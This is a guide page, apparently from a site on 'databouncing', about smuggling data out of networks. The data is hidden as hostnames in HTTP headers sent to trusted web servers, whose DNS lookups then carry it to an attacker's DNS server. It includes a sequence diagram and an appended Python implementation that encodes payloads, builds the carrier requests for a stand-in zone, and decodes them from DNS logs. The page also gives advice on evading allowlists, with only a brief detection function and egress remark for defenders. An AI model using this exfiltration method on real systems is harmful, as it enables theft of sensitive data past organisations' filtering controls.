Web Headers (HLD)

  • @site.url: https://databouncing.io
  • path: /webheadershld/
  • excerpt: Mermaid Diagram Journey of Databouncing with HTTP Web Headers via trusted web servers and ultimately handed over to the exfil DNS
  • published date:
  • reading time: 1 minute
  • tag: Guides
  • authors: JC

This Mermaid diagram visualizes the journey of carefully positioned exfil data on its way to an informed listener. The headers shown are examples; we've found Host headers to be the most popular, others work and you should find them, but these are the top few.

```mermaid
sequenceDiagram
    participant E as Exfil System
    participant W as Trusted Webservers
    participant D as DNS Server - Exfil Collect
    E->>W: HTTP requests to high-integrity domains
    Note over E,W: Headers:<br/>Host: secretmessage1.exfil.com<br/>X-Forwarded-For: secretmessage2.exfil.com<br/>Referer: secretmessage3.exfil.com
    Note over W: Incoming HTTP requests delivered to the trusted webserver, containing sensitive exfiltrated data in headers
    W-->>E: HTTP response
    Note over E,W: Confirms receipt of the HTTP request with sensitive data in the headers
    alt Hostname Lookup Solicitation
        W->>D: Lookup secretmessage1.exfil.com
        Note over D: Exfiltration data received (hostname: secretmessage1.exfil.com)
        D-->>W: IP for secretmessage1.exfil.com
        Note over W: Received IP address corresponding to secretmessage1.exfil.com
        W->>D: Lookup secretmessage2.exfil.com
        Note over D: Exfiltration data received (hostname: secretmessage2.exfil.com)
        D-->>W: IP for secretmessage2.exfil.com
        Note over W: Received IP address corresponding to secretmessage2.exfil.com
        W->>D: Lookup secretmessage3.exfil.com
        Note over D: Exfiltration data received (hostname: secretmessage3.exfil.com)
        D-->>W: IP for secretmessage3.exfil.com
        Note over W: Received IP address corresponding to secretmessage3.exfil.com
    end
    W-->>E: DNS resolution complete
    Note over E,W: Web server returns the final HTTP response to the client, confirming successful hostname lookups
```

So, if you imagine the high-integrity domains being something like Microsoft, your defense provider, an analytics service, an associated domain that has been seen in your DNS TXT records, or a known service provider to your organization, this is more than enough to pass most web filtering systems and allowlists. The outbound request itself goes to an allowed destination; the exfil data only leaves in the web server's own DNS lookup of the header value, which the client-side filter never sees.
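The exchange in the diagram, carried through as an added example that is not the page's or databouncing.io's own code: the sender chunks a payload into DNS-safe hostnames and rotates them through the Host, X-Forwarded-For and Referer headers; the collector reassembles the payload from its authoritative DNS server's query log; and a defender-side check shows what this encoding leaves behind in a web server's Host values. All names are constructed for the example: `exfil.example` stands in for the attacker-controlled zone, `trusted.example` for the bounced-off high-integrity server, and the query-log line format is a constructed BIND-style sample.

```python
from __future__ import annotations
import base64
import re

# Hypothetical names for this example (not from the original page).
EXFIL_DOMAIN = "exfil.example"      # attacker-controlled zone; its authoritative DNS logs lookups
TRUSTED_HOST = "trusted.example"    # high-integrity web server the requests are bounced off
SESSION = "s1"                      # groups one transfer's chunks in the DNS log

MAX_LABEL = 63      # RFC 1035 single-label limit
CHUNK_BYTES = 30    # 30 bytes -> exactly 48 base32 chars, leaving room for the sequence prefix
HEADERS = ("Host", "X-Forwarded-For", "Referer")   # the three carriers from the diagram


def encode_hostnames(data: bytes, session: str = SESSION) -> list[str]:
    """Chunk data into names of the form <seq>-<base32>.<session>.<EXFIL_DOMAIN>.
    Lower-cased, unpadded base32 survives case-insensitive resolvers and 0x20
    randomisation; the sequence prefix lets the collector reorder lookups."""
    names = []
    for seq, start in enumerate(range(0, len(data), CHUNK_BYTES)):
        b32 = base64.b32encode(data[start:start + CHUNK_BYTES]).decode().rstrip("=").lower()
        label = f"{seq}-{b32}"
        assert len(label) <= MAX_LABEL
        names.append(f"{label}.{session}.{EXFIL_DOMAIN}")
    return names


def build_requests(hostnames: list[str]) -> list[str]:
    """Raw HTTP/1.1 requests, rotating the carrier header per chunk. The TCP
    connection goes to TRUSTED_HOST; only a header value carries the name the
    server is expected to resolve."""
    reqs = []
    for n, name in enumerate(hostnames):
        carrier = HEADERS[n % len(HEADERS)]
        lines = ["GET / HTTP/1.1"]
        if carrier == "Host":
            lines.append(f"Host: {name}")
        else:
            lines.append(f"Host: {TRUSTED_HOST}")
            lines.append(f"Referer: https://{name}/" if carrier == "Referer"
                         else f"X-Forwarded-For: {name}")
        lines += ["Connection: close", "", ""]
        reqs.append("\r\n".join(lines))
    return reqs


# Collector side: pull the queried name out of a BIND-style query-log line.
QUERY_RE = re.compile(r"query: (\S+?)\.? IN ")


def decode_dns_log(lines: list[str], session: str = SESSION) -> bytes:
    """Reassemble the payload from authoritative-DNS query logs, tolerating
    out-of-order, duplicated and mixed-case lookups."""
    suffix = f".{session}.{EXFIL_DOMAIN}"
    chunks: dict[int, bytes] = {}
    for line in lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        qname = m.group(1).lower()
        if not qname.endswith(suffix):
            continue
        seq, _, b32 = qname[: -len(suffix)].partition("-")
        if not seq.isdigit():
            continue
        b32 = b32.upper()
        chunks[int(seq)] = base64.b32decode(b32 + "=" * (-len(b32) % 8))   # restore padding
    return b"".join(chunks[k] for k in sorted(chunks))


# Defender side: a Host value no local vhost serves, carrying a long label drawn
# purely from the base32 alphabet, is the signature this encoding leaves in access logs.
BLOB = re.compile(r"[a-z2-7]{20,}")


def flag_host_headers(host_values: list[str], served: set[str]) -> list[str]:
    return [h for h in host_values
            if h.lower() not in served
            and any(BLOB.search(lbl) for lbl in h.lower().split("."))]


# Constructed sample payload and query log (order reversed, one unrelated line) for a stand-alone run.
SAMPLE_DATA = b"the quick brown fox jumps over the lazy dog 0123456789"
SAMPLE_NAMES = encode_hostnames(SAMPLE_DATA)
SAMPLE_LOG = [
    "client @0x7f 203.0.113.7#41233 (www.example): query: www.example IN A + (198.51.100.2)",
] + [f"client @0x7f 203.0.113.7#41233 ({n}): query: {n.upper()} IN A + (198.51.100.2)"
     for n in reversed(SAMPLE_NAMES)]

if __name__ == "__main__":
    for r in build_requests(SAMPLE_NAMES):
        print(r)
    print(decode_dns_log(SAMPLE_LOG))
    print(flag_host_headers([TRUSTED_HOST, SAMPLE_NAMES[0]], {TRUSTED_HOST}))
```

Whether the trusted server actually resolves a given header is what the diagram's "Hostname Lookup Solicitation" branch stands for, and it varies by server and header: a Host value typically triggers a lookup only where a vhost, redirect or proxy configuration acts on it, so the sender should confirm each carrier against each target before relying on it. On the defending side, the same `flag_host_headers` check run over web access logs, together with an egress rule that the server may only resolve names it serves, removes the side channel without touching the allowlist.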